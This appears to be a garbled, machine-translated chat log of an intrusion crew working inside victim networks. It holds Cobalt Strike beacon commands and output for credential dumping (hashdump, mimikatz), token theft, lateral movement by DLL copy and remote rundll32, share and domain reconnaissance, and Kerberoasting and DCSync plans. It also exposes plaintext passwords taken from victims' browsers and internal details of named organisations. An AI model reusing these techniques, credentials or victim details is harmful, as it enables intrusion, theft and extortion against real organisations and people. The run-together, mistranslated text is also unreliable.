SERVICE 3504 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3520 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 3724 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 3904 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3924 752 SearchIndexer.exe x64 0 
NT AUTHORITY\SYSTEM 4000 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 4068 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 4208 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 4336 752 securityHealthService.exe x64 0 NT AUTHORITY\SYSTEM 4400 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 4788 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 4812 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 5212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 5236 752 NisSrv.exe x64 0 NT AUTHORITY\LOCAL SERVICE 6044 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 820 656 lsaIso.exe x64 0 NT AUTHORITY\SYSTEM 828 656 lsass.exe x64 0 NT AUTHORITY\SYSTEM 672 648 csrss.exe x64 1 NT AUTHORITY\SYSTEM 760 648 winlogon.exe x64 1 NT AUTHORITY\SYSTEM 76 760 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 1064 760 logonUI.exe x64 1 NT AUTHORITY\SYSTEM 1216 760 dwm.exe x64 1 Window Manager\DWM-1 ``get the full list of processes here,`` only on 2 windows 10 ``:thinking:but he has access to the admin ball or says that the current user is not LAELWAYS spam sessions without *she will try to do something about it about the current machine oddly shortly this user has admins only on 2 windas 10enterprice (empty), on 1 servak (current machine), the other 319 are Windows education, computers in the students, they have nothing to catch it and was going to do and tell me whether there is a server OS from the old list of hosts with admin balls turns out so that now we have that yesterday's polozak?i have no usernames and passwords at all and i started reshooting the ballsvirtually 20 minutes ago i restored it via Citrix as i came with it a session hung for 8 hours i wrote that polzak session or login / pass remained? no polzak the same? now i will download it again, yesterday you were from there selected hosts with admin balls? i mean the previous output list was not added more job just hung everything that has collected ``` [*] Parsed 7530 computer objects. 
Shares for CONDORCLUSTER: [--- Unreadable Shares ---] ClusterStorage$ IPC$
Shares for WILDCATNEW: [--- Unreadable Shares ---] IPC$
Shares for COB-62001: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for chem-62837: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---]
    ccdc
    Chalk Research Group's Public Folder
    Chalk, Stuart's Public Folder
    chembl
    COASAdmin's Public Folder
    donh's Public Folder
    ncct
    nistsdm
    trc
Shares for CEC-59126: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ E$ F$ K$ print$
Shares for WILDCAT: [--- Unreadable Shares ---] IPC$
Shares for Coppicecluster: [--- Unreadable Shares ---] ClusterStorage$ IPC$
Shares for ThicketA: [--- Unreadable Shares ---] IPC$
Shares for primrose: [--- Unreadable Shares ---] IPC$
Shares for hedgea: [--- Unreadable Shares ---] IPC$
Shares for ThicketB: [--- Unreadable Shares ---] IPC$
Shares for BriarA: [--- Unreadable Shares ---] IPC$
Shares for ThicketC: [--- Unreadable Shares ---] IPC$
Shares for PHYS-65427: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65428: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65430: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63941: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65439: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65440: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65435: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65438: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63945: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65433: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65437: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63943: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65432: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65442: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63947: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65441: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ print$
Shares for PHYS-65436: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for thicketd: [--- Unreadable Shares ---] IPC$
Shares for ThicketE: [--- Unreadable Shares ---] IPC$
Shares for CEC-66268: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ Users
Shares for PHL-66859: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for CEC-63643: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ print$
Shares for PHL-66860: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66886: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66897: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66872: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66891: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66868: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66865: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66866: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66882: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66885: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66884: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66892: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66368: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66375: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66373: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66382: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66400: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66377: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66381: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66394: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66385: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66396: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66397: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66384: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66392: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66401: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66386: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66399: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66393: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for mus-63011: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---]
    Administrator's Public Folder
    Biernacki, Krzysztof's Public Folder
    Daugherty, John's Public Folder
    Hines, Clarence's Public Folder
    Pavlesich, Adina's Public Folder
    Studio Lessons's Public Folder
    n00865522

Give me the whole list of PCs with admin shares under the current user. Completion on another machine gives a different result, but again only in this session.

```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results.
```

hashdump comes back with a minus, but the computer itself seems to have been worked through one way or another, i.e. there is output, etc.

```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```

```
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs

 JID  PID    Description
 ---  ---    -----------
 17   12304  process
```

```
beacon> shell copy x64.dll \\139.62.66.77\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.66.77\C$\ProgramData
[+] host called home, sent: 73 bytes
```

```
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is CA3E-DD31

 Directory of C:\ProgramData

12/02/2020  04:31 AM                   %LOCALAPPDATA%
12/01/2020  04:27 PM               272 2013.par
04/07/2018  11:09 AM            35,888 3002.abs
05/02/2015  07:50 PM            15,568 3029.abs
11/11/2019  05:42 PM                   ABBYY
10/12/2020  01:43 PM                   Adobe
11/20/2020  09:32 AM
```

Certainly, in the session from which I could not push the DLL to the other computers, mimikatz worked with an error, Google pinged, and the shares via the shell-type output are in this output, but not from all of the previous ones. After adfind it first didn't work, then broke; it feels like the response took about 10 minutes, although the heartbeat is about 3-5 seconds. Were you in both Cobalts? Does the beacon output not come back from the network?
But I'm talking specifically about the current network. The scanners are not sleeping in the new one, which is wikibros.com; today a lot of stray sessions came in. The previous one, which is likenic.com, I went into yesterday and there was a bunch of sessions with 500-800 hours of sleep.
I gave you the additional Cobalt. Does this anomaly arrive in both Cobalts for you? By the way, the Cobalt got 90% in BL.) It didn't come to me. Understood. I made a case in an existing session: there is "host called home", but no output in the beacon?
In short, from that session the calls to the other computers didn't work: there is no output, it's not working and I can't copy. I can't copy from that session. I just went back to Citrix and saved myself yesterday's starting session; I'm re-shooting the shares just in case. There will be more, and I can spam, waiting until one has 10 unterricks. Mainly Windows 10 Education; as yesterday I have access to Windows 10 Education, did steal_token, injected into the user's process, the session either does not appear, or appears stillborn. @tl1 so you fix it, since there are system sessions. In general, in the session where there was a user I jumped out; the system one remains, there is another user, now I will jump into his process and will look at the shares again. Then dcsync here. DCSYNC removed; looking for cloud administration of Webroot SecureAnywhere. In the SPNs there is `>servicePrincipalName: exchangeAB/JDODC67.jdossn.local` - it pings. What to do with it? In ad_users there is something like ` smtp:NHNorRAremb@jdisonline.com` but `jdisonline.com` does not resolve. Google, Hotmail, Yahoo, etc. in the browsers; they have public services. Sec, also, when you pulled the browsers, where do they have mail? Or in the SPNs can exchangemailEX also be written? =) No one with a name that has `exc`. I'll check, and you look at the Exchange server? It's a pinged list of servers; how to find it? From where I am, most of them don't seem to be visible at all. Did you scan the ranges? The web server that holds the Citrix authorization is VERY often not in the domain. I check this list via dirb.
```
[+] 172.31.45.14:    - 172.31.45.14:80 - TCP OPEN
[+] 10.99.202.247:   - 10.99.202.247:80 - TCP OPEN
[+] 10.99.205.75:    - 10.99.205.75:80 - TCP OPEN
[+] 10.99.195.11:    - 10.99.195.11:443 - TCP OPEN
[+] 10.99.202.247:   - 10.99.202.247:443 - TCP OPEN
[+] 172.31.190.157:  - 172.31.190.157:443 - TCP OPEN
[+] 10.99.198.60:    - 10.99.198.60:443 - TCP OPEN
[+] 10.99.193.18:    - 10.99.193.18:443 - TCP OPEN
[+] 10.99.198.60:    - 10.99.198.60:80 - TCP OPEN
[+] 172.31.45.15:    - 172.31.45.15:80 - TCP OPEN
[+] 10.99.205.75:    - 10.99.205.75:443 - TCP OPEN
[+] 10.99.202.181:   - 10.99.202.181:443 - TCP OPEN
[+] 10.99.201.43:    - 10.99.201.43:443 - TCP OPEN
[+] 10.99.193.24:    - 10.99.193.24:443 - TCP OPEN
[+] 10.99.193.24:    - 10.99.193.24:80 - TCP OPEN
[+] 10.99.201.43:    - 10.99.201.43:80 - TCP OPEN
[+] 172.31.45.20:    - 172.31.45.20:80 - TCP OPEN
[+] 10.99.193.18:    - 10.99.193.18:80 - TCP OPEN
```

It's not necessary; you just have a direct redirect from the host on the port, which you can brute-force over SOCKS the right way. Look, there are such utilities: dirb / dirbuster. Then yes. I understand it is a local hostname or address; I did not specify an external domain, it is on the local network. I suggest checking. No, in Amazon there is 2FA. I check on the local; I don't think it's worth climbing into Amazon. In general, as I understood, they used to have their own Citrix; after it, a certain number of servers were left. Now they're in the cloud on Amazon. And it looks like it's not their Citrix, but John Deere's, and it has LDAP authorization bolted on to it. I'm looking on their local servers now - maybe there's something left... Take all the hosts that are open on port 80/443 and run dirbuster in the format https://hostname/vpn/index.html or https://ipaddr/vpn/index.html. `https://*domain.com/vpn/index.html` - here's the default path to the Citrix login. I'm a little confused maybe... but why Citrix? Pre-select all live servers with a hint of Citrix in the name or description. What I'm trying here: I found that it is not login but cgi/login. Yes.
And were http and https added? The computer name does not have to equal the server name. login also comes here by itself: https://....../login, so go by name; the name might show something... 80 is the same; check both 80 and 443. Ports can be specified by name or by IP; it is a separate configuration block, access by IP. For example nginx, if so configured, serves by name, but by IP gives a 404. The scheme http(s), why? Well, within the domain a web server may simply give nothing when accessed by IP. systeminfo, ipconfig. Local - what? And then how to pull all the local DNS? What is available, and locally. Here's another question - there are Citrix Delivery Controllers, there is Citrix Director, probably something else. What should I look for? As an option, write the domain to the local IP in the hosts file. Citrix I'll try. Yes, just logging in by IP - the auto-redirect will not work. 443, 80, the same web admin port.) What port, Citrix? 80???

```
beacon> portscan 3.15.36.195 80,443 icmp 2
[*] Tasked beacon to scan ports 80,443 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```

Yeah, LDAP is probably connected, but I don't think it's part of the domain. Then 80 and 443.

```
beacon> shell ping signon.jdisonline.com
[*] Tasked beacon to run: ping signon.jdisonline.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging ok11-crtr-custom-domains-cd76c2bd4d92725a.elb.us-east-2.amazonaws.com [3.15.36.195] with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
[+] received output:
Request timed out.
```
Ping statistics for 3.15.36.195: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), beacon> portscan 3.15.36.195 445,139 icmp 2 [*] Tasked beacon to scan ports 445,139 on 3.15.36.195 [+] host called home, sent: 93245 bytes [+] received output: Scanner module is complete ``Can you see ports 445,139 445? ping what? if citrix, amazon. but samaccountname from local domain is specified in settings? their servers may be on amazon in some strange place. but it seems they have different settings. two of them ask for 2FA when they login and one of them asks for 2FA when they change their settings here too ``. --- Chromium Credential (User: ndmicjsater) --- URL : https://jdoapps.jdisonline.com/cgi/login Username : ndmicjsater Password : NDleading22 Is it okay if it's their server or not? It looks like they dragged the Citrix servers to amazom. is that okay? >memberOf: CN=NDLEADING_Citrix_Local_Drives, ``Then take down the browsers where you can and look for citrixstrannotut and the usual polzacs no more. and the AD_comp `34648 Objects returned`` external? UserName : jdodmp_svc ComputerName : JDODC67.jdossn.local SessionFrom : 204.54.154.136 SessionFromName : JDODMP03.jdossn.local LocalAdmin : False they are not in this subnet and can't see them from here (so go to the DAE PC and take their hash off) practically. on the DAE does not let in all? and not the servers does not let in. on the user PCs the same LA, so you only go to the user PCs? i dont remember, i think i checked. i don't remember. i think i checked it again. 
>uSNCreated: 63484
>memberOf: CN=NDLEADING_DPARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_PARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Citrix_Local_Drives,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_SDK_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Technicians,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Schedulers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Managers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Reports_Drive,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPPatch_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Dealer_Portal_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf:
CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local ``Where did you find webroute access not YES? they administer under LA only in kerbaha nowhere YES? yeah dunno. now 10 active. i think i went through all the available pk on the available? and yes, i can not go out of the local network and i can not take the yes? and you have already found the admin? ah, no))) i also have a webrout stoit you already found the admin in the second network? and you have not mixed up the group? no. neighborxox threw from the car polzak where did you take access? ``` --- Chromium Credential (User: ndmicjsater) --- URL : https://my.webrootanywhere.com/default.aspx Username : jasons@leadingedgeequip.com Password : jsateren8726 ``` but there still asks for confirmation code 2FAtry through RDPoping. went through smb_login - among those where the codes fit there are 2 servers with open RDP.pinging the list of servers, for the following smb login ``. beacon> shell wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture [*] Tasked beacon to run: wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture [+] host called home, sent: 104 bytes [+] received output: Node - 172.31.190.103 ERROR: Description = The RPC server is unavailable. \remote-exec wmi 172.31.190.103 rundll32 \\172.31.190.103\testvolume\GH-GHNS-DHS_Copy\office365\mui.dll entryPoint\remote-exec all three methodsa run how?[ ](https://mediaeveryone.com/group/snpartners-com?msg=apMHH3c8mKdEeZrMmh) Well on NAS it is not wind most likely )) no, maybe you can put it in the group yes? about failed to start the dll ie? do not change the passwords on the other is just a user. on NAS to start the dll did not work. He has rights to change passwords, as I understand it. Is there any way to use this?[ ](https://mediaeveryone.com/group/snpartners-com?msg=4pFWzF5wGgrJ9usov) and there are no other accesses? ``` Username : nddevbernst Password : NDleading2021! 
``only to custom ones. some to the aggressor whale could you send me a link to a netlogon that worked and the admin above is nowhere to be found? i need to duplicate it in the confuscha let me duplicate it again, i lost the 445 port results file what kind of pc? all sannets from the adfind on /24 scanned, only 3-4 computers in the game did you look for vg and external backups? in spns is hyper-v replica service on several machines, this is the maximum i saw 0 trusts 37 servers 1205 armies i think if you pinged it, it would be much less and how many servers, armies and trusts us, i looked there, iscsi is empty there's ehs, no creed there are two servers bgukhoveam there's a tiny bit of .bco-shares bally44backup there's a lot of backups nothing else found a la wsphere, hypervisors, etc[ ](https://mediaeveryone.com/channel/general?msg=zbgfwydjaxhwyWEwu) any signs of cloud solutions? let's complicate the process today, let's check the WOL. then write to the group the number of pcs, arms and trustschromium admins, chromium all polozakonea, ran through all computers where admins sat yesterday then today we close, admins surely had no hints of claud or vg on backups?yes[ ](https://mediaeveryone.com/channel/general?msg=WGerCebrheZx2Wd3o) there are all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. i remove the credentials from them via CME[ ](https://mediaeveryone.com/channel/general?msg=TQsXdkctah9AnbJNo) the same thing There are a couple of subnets left to scan. so far nothing in bellimore still in search of the creeds from the echyotr write down, what are your results? in preparation for closing in balimorladno, clarified. if you are done with the lab go to the networks[ ](https://mediaeveryone.com/channel/general?msg=HMAxxaonYPKBkydbG) 3 days ago I tried to build a server, at what time do not remember. fuck.... I'm already confused on all sides.or am I misunderstanding? 
just not setting up and building the server so you were still busy with lab 3 days ago? for lab, should have been but nothing started on it. I put it aside, it's at my desk. Then I brought a different office on it started up and now it's spinning. Do you want me to describe the hardware? [ ](https://mediaeveryone.com/channel/general?msg=5ywWviKNjaaKB8v2B) and this [ ](https://mediaeveryone.com/channel/general?msg=NMJXZRRGGaRR3RnGr) + [ ](https://mediaeveryone.com/channel/general?msg=FvaSSFmTR9MEnhQP6) I already saw it, it's just 16 minutes on the 22nd, counted as three days[ ](https://mediaeveryone.com/channel/general?msg=cxkivPJYBETLt6ffr) pieced together = assembled? What kind of server? 100% Yesterday today I did lab, I can't tell you. Before that I was piecing a server on a Chinese mother that does not fuckin' work! that was three days ago. so yesterday and today? yeah, yesterday. not much sleep. i don't remember what happened three days ago. I sign up uni yesterday yesterdayrahm, maybe I'm already confused uni it was yesterday ? gave you an individual problem on the vpn like, which then @user7 left, strong strong and so on)you said that the lab I remember the day before yesterday I asked you to work on the net finished about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you. how much time was busy with this task? 
Finished with the web interfaces; doesn't yield much. Found: 1 ushi (no creds), 1 us (no creds), iLO 4 ProLiant, iLO 54 ProLiant. The last two things I have not figured out what they are, and no creds. iLO 4 ProLiant, 54 ProLiant: not yet figured out what they are, well, there are no creds. main.crispregional.org. Also looking for hints of backups in the workgroups and the clouds. Write at the same time that that's all on the tasks; let's move on to the main tasks. Thank you. Tell him that he has 10 minutes to contact the boss; call promptly please, @ot, let him answer the boss. And here we are all trying to make sense of this situation. If not, then it turns out that @ot himself checked; none of us have checked. So, only @ot and @user3 were aware of this kitchen. No.) And you sent them to check? What's the problem with the tests? We don't know about it, only @ot does. Ask the others about the tests. @ot: tests - I don't know; lab - @ot and @user3; the last one is closed, @user3 was busy configuring it. So, in order: who did the interviews, tests, labs? Maybe someone will have problems depending on your answers.) Okay, never mind, what do you mean by that? And I also talk about tests and labs; we talk about the tests and the interviews specifically. Labs, I mean who works with it; from what I observe, @user3. And tests, who checked? @ot. Who conducted the interviews? So? So it's rather under the direction of @user3, over which @user3 still works. Eeh, the lab.) ot2, is it you who knows about the lab, tests and other things under the direction of @ot? Distracted yet? Then they immediately got 1 DC and picked up the same PDC. Here, 1 DC. So, all ok?

```
List of DCs in Domain
\\WDC1 (PDC)
```

I did `shell nltest /dclist` without `:`

```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Get list of DCs in domain '' from '\\WWDC1.waterway.com'.
You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum).
List of DCs in Domain
\\WDC1 (PDC)
The command completed successfully
```

`shell nltest /dclist:`

```
beacon> shell net accounts
[*] Tasked beacon to run: net accounts
[+] host called home, sent: 43 bytes
[+] received output:
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          90
Minimum password length:                              6
Length of password history maintained:                10
Lockout threshold:                                    15
Lockout duration (minutes):                           5
Lockout observation window (minutes):                 5
Computer role:                                        WORKSTATION
The command completed successfully.
```

nltest output:

```
beacon> net domain
waterway.com

beacon> net domain_controllers
Domain Controllers:
[-] Error: 0

beacon> shell nltest /dclist:waterway.com
Get list of DCs in domain 'waterway.com' from '\\WWDC1.waterway.com'.
Cannot DsBind to waterway.com (\\WWDC1.waterway.com). Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE
I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND

beacon> shell net accounts /dom
The request will be processed at a domain controller for domain waterway.com.
System error 5 has occurred.
Access is denied.
```

But just throw the commands into the sleep. But check whether the domain is alive or not.) With waterway, 2 sessions sleeping. #ballymoregroup-com found ESXi, no creds yet. Checked all my DAs with sniper - they are sitting on servers; in Chrome only one had a password without a username, from an unopened interface. Checking of the scanned interfaces is in process. Sniper check of all sysadmins and IT guys is in process. I have a couple of sessions in the sleep. Waterway I have not seen. Nimble here: hashes are different, but not valid. Nimble is dead? All empty? Not even the hashes are different? 6 computers where he was with the rights pulled, and in them for now and stay. LA was; you did not have AD?
Hashes given to tl2. So far nothing interesting; other than what I wrote in the conf, found nothing. Creds still not found. Ran invey and caught some interesting information - the assumption that the seven found earlier is outside the domain looks reasonable, because I found several other similar connections. Scan the subnets for 445 443 22 80. Search the files on the computers where you have access; don't forget the cloud solutions. main.crispregional.org. There is a vSphere, AV, backups. Looking for backups in the groups in `CORP.TELEVISA.COM.MX`. I've jumped into `CORPSFECRT04`; there is nothing on the creds, now I'll go further. Untwisted. Write down the status of the work to get there. Some creds fit there, but only as a normal user. Maybe something like that: //www.zoller.info/en/products/tool-management/storage-systems/keeper) And what, the drill can't kill? Yeah, no idea. They sell weapons, and these drills. Assumption: //www.zoller.info/en/home?r=1

```
10.0.0.24  0EA78803  [Win Embedded Standard 7601 SP 1]
```

Probably because it's some kind of cut-down sevens, but you need proof. As a variant - that's the name of the title in rssu.com. Looking for the right creds. While I was looking, found:

```
(platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
```

And now looking for confirmation of a second domain; who works with it? Access and other stuff, and looking for external and internal storage, and the quality of the locale itself; we'll give up on that. About creating backups: looking for backups, auth, then listings. SQL, mail, files. Creds only, no backups found. #ballymoregroup-com check the web interfaces that were scanned. Write what you are doing? In another.) Push @user7 into the conf to see where everyone is at?
Hello :space_invader: everyone, say goodbye until tomorrow. It is mandatory: items + cloud, check backups in workgroups. Tomorrow will close a couple of networks and tomorrow by 6 pm will finalize. `benihana.com` starting user is worked through, kerberoast is taken, AD is taken, ShareFinder is dropped. `ballymoregroup.com` found 2 NAS, one dead; 2 backup servers found, listings made; 2 Exchange; AD not pinging `Ping request could not find host`, pinging in the process. LA starter user on several machines. Went everywhere, took off browsers, hashdump and mimikatz. From all of this found two different AD hashes, but apparently old. No kerberoast - it writes something like `[X] No users found to Kerberoast!` main.crispregional.org What's left: backups to find, optionally AV. Tomorrow by 4 I think, half an hour more. What are we up to today?

```
main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST
```

That's what kind of silent exciter. And all alive, so I killed it a long time ago. Better spawn it? Why should it die in the first place? It won't die. Do a spawn first. Do a spawn; kill, and the session will die.

```
psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
```

`CheckShareAccess`?

```
ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'.
```

Where is the -checkaccess flag?

```
beacon> psinject 4540 x64 Invoke-ShareFinder
```

I also wondered whether it shows accessible shares, not just enumerates shares? Ah, it's for that message.) Yeah, I don't know.)) I thought the roll call is for whom and where? sccy.com it turns out... No big deal, it turns out? Not a wrong password? It says access denied. If you're talking about the ShareFinder output, look it up above: access denied. They have a lockout after 5 failed, I think. How not to break it with the admin? Not yet out of the point?
